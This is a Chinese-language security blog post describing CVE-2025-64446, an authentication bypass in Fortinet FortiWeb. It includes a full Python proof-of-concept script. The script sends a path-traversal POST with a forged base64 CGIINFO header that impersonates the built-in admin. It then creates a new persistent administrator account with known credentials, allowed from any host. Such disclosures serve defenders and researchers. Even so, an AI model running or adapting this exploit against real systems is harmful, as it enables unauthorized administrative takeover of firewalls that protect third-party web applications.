CVE-2025-64446|Fortinet FortiWeb身份验证绕过漏洞(POC)
CVE-2025-64446|Fortinet FortiWeb身份验证绕过漏洞(POC)
信安百科
发布于 2025-11-24 14:04:14
发布于 2025-11-24 14:04:14
0x00 前言
FortiWeb是Fortinet公司推出的企业级Web应用防火墙(WAF),专为保护Web应用和API抵御高级威胁设计。它集成人工智能与机器学习技术,通过双层检测引擎(HMM模型与SVM向量机)精准识别异常流量,可防御OWASP Top 10攻击、SQL 注入、XSS、DDoS及恶意机器人。其核心功能包括API自动化保护、虚拟补丁集成(兼容Acunetix等第三方扫描工具)及智能流量分析,支持HTTP/2、WebSocket等现代协议。
0x01 漏洞描述
攻击者可向特定端点
/api/v2.0/cmd/system/admin%3F/../../../../../cgi-bin/fwbcgi
发送精心构造的HTTP POST请求,借此滥用fwbcgi二进制文件中 cgi_auth () 函数在认证机制上的缺陷 —— 该函数不验证用户身份,通过客户端发送的base64编码CGIINFO HTTP头接收身份信息,并从中提取 username、profname、vdom、loginname四个关键字段。
由于内置 admin 账户在所有 FortiWeb 设备上具有不可修改的统一属性,攻击者可构造包含这些属性的 JSON 结构(如{"username":"admin","profname":"super_admin","vdom":"root","loginname":"admin"})完成身份冒充;一旦该头信息被cgi_auth ()函数处理后,攻击者便获得完全管理员权限,进而执行任意命令(包括创建具有已知凭据的持久性管理员账户)。
0x02 CVE编号
CVE-2025-64446
0x03 影响版本
Fortinet FortiWeb 8.0.0-8.0.1
FortiWeb 7.6.0-7.6.4
FortiWeb 7.4.0-7.4.9
FortiWeb 7.2.0-7.2.11
FortiWeb 7.0.0-7.0.110x04 漏洞详情
POC:
https://github.com/watchtowrlabs/watchTowr-vs-Fortiweb-AuthBypass
import http.client
import ssl
import base64
import json
from uuid import uuid4
import sys
banner = """ __ ___ ___________
__ _ ______ _/ |__ ____ | |_\\__ ____\\____ _ ________
\\ \\/ \\/ \\__ \\ ___/ ___\\| | \\| | / _ \\ \\/ \\/ \\_ __ \\
\\ / / __ \\| | \\ \\___| Y | |( <_> \\ / | | \\/
\\/\\_/ (____ |__| \\___ |___|__|__ | \\__ / \\/\\_/ |__|
\\/ \\/ \\/
watchTowr-vs-Fortiweb-AuthBypass.py
(*) FortiWeb Authentication Bypass Artifact Generator
- Sina Kheirkhah (@SinSinology) and Jake Knott (@inkmoro) of watchTowr (@watchTowrcyber)
CVEs: [CVE-2025-xxxxx]
"""
print(banner)
if len(sys.argv) != 2:
print("Usage: python3 watchTowr-vs-Fortiweb-AuthBypass.py <target_fortiweb_ip>")
sys.exit(1)
user = str(uuid4())[:8]
passwd = user
host = sys.argv[1]
raw_path = "/api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi"
cgiinfo_json = {
"username": "admin",
"profname": "prof_admin",
"vdom": "root",
"loginname": "admin"
}
cgiinfo_b64 = base64.b64encode(json.dumps(cgiinfo_json).encode()).decode()
headers = {
"CGIINFO": cgiinfo_b64,
"Content-Type": "application/x-www-form-urlencoded",
}
body = {
"data": {
"q_type": 1,
"name": user,
"access-profile": "prof_admin",
"access-profile_val": "0",
"trusthostv4": "0.0.0.0/0",
"trusthostv6": "::/0",
"last-name": "",
"first-name": "",
"email-address": "",
"phone-number": "",
"mobile-number": "",
"hidden": 0,
"comments": "",
"sz_dashboard": -1,
"type": "local-user",
"type_val": "0",
"admin-usergrp_val": "0",
"wildcard_val": "0",
"accprofile-override_val": "0",
"sshkey": "",
"passwd-set-time": 0,
"history-password-pos": 0,
"history-password0": "",
"history-password1": "",
"history-password2": "",
"history-password3": "",
"history-password4": "",
"history-password5": "",
"history-password6": "",
"history-password7": "",
"history-password8": "",
"history-password9": "",
"force-password-change": "disable",
"force-password-change_val": "0",
"password": passwd
}
}
body_data = json.dumps(body)
context = ssl._create_unverified_context()
conn = http.client.HTTPSConnection(host, 443, context=context)
conn.request("POST", raw_path, body=body_data, headers=headers)
resp = conn.getresponse()
if(resp.status == 200):
print("[+] Exploit sent successfully.")
print(f"[*] Check for the new user [ {user} ] with password [ {passwd} ]")
else:
print("[-] Exploit failed. Status Code:", resp.status)0x05 参考链接
https://fortiguard.fortinet.com/psirt/FG-IR-25-910
推荐阅读:
CVE-2025-25256|Fortinet FortiSIEM 远程命令执行漏洞(POC)
CVE-2025-25257|Fortinet FortiWeb SQL注入漏洞(POC)
CVE-2025-32756|Fortinet多款产品存在远程代码执行漏洞(POC)
Ps:国内外安全热点分享,欢迎大家分享、转载,请保证文章的完整性。文章中出现敏感信息和侵权内容,请联系作者删除信息。信息安全任重道远,感谢您的支持
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2025-11-16,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
腾讯云开发者
